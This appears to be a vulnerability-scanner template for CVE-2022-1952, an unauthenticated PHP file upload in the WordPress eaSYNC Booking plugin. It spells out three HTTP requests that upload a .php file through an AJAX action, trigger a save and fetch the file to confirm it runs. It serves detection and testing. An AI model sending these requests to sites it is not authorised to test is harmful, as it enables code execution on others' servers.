id: CVE-2022-1952 info: name: WordPress eaSYNC Booking <1.1.16 - Arbitrary File Upload author: theamanrawat severity: critical description: | WordPress eaSync Booking plugin bundle for hotel, restaurant and car rental before 1.1.16 is susceptible to arbitrary file upload. The plugin contains insufficient input validation of an AJAX action. An allowlist of valid file extensions is defined but is not used during the validation steps. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. reference: - https://wpscan.com/vulnerability/ecf61d17-8b07-4cb6-93a8-64c2c4fbbe04 - https://wordpress.org/plugins/easync-booking/ - https://nvd.nist.gov/vuln/detail/CVE-2022-1952 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-1952 cwe-id: CWE-434 epss-score: 0.95933 cpe: cpe:2.3:a:syntactics:free_booking_plugin_for_hotels\,_restaurant_and_car_rental:*:*:*:*:*:wordpress:*:* epss-percentile: 0.99225 metadata: max-request: 3 verified: true framework: wordpress vendor: syntactics product: free_booking_plugin_for_hotels\,_restaurant_and_car_rental tags: cve,cve2022,wpscan,wordpress,easync-booking,unauth,wp,file-upload,wp-plugin,intrusive http: - raw: - | POST /wp-admin/admin-ajax.php HTTP/1.1 Host: {{Hostname}} Cookie: PHPSESSID=a0d5959357e474aef655313f69891f37 Content-Type: multipart/form-data; boundary=------------------------98efee55508c5059 --------------------------98efee55508c5059 Content-Disposition: form-data; name="action" easync_session_store --------------------------98efee55508c5059 Content-Disposition: form-data; name="type" car --------------------------98efee55508c5059 Content-Disposition: form-data; name="with_driver" self-driven --------------------------98efee55508c5059 Content-Disposition: form-data; name="driver_license_image2"; filename="{{randstr}}.php" Content-Type: application/octet-stream --------------------------98efee55508c5059-- - | GET /wp-admin/admin-ajax.php?action=easync_success_and_save HTTP/1.1 Host: {{Hostname}} Cookie: PHPSESSID=a0d5959357e474aef655313f69891f37 - | GET /wp-content/uploads/{{filename}}.php HTTP/1.1 Host: {{Hostname}} req-condition: true matchers: - type: dsl dsl: - contains(header_3, "text/html") - status_code_3 == 200 - contains(body_1, 'success\":true') - contains(body_3, 'e0d7fcf2c9f63143b6278a3e40f6bea9') condition: and extractors: - type: regex name: filename group: 1 regex: - 'wp-content\\\/uploads\\\/([0-9a-zA-Z]+).php' internal: true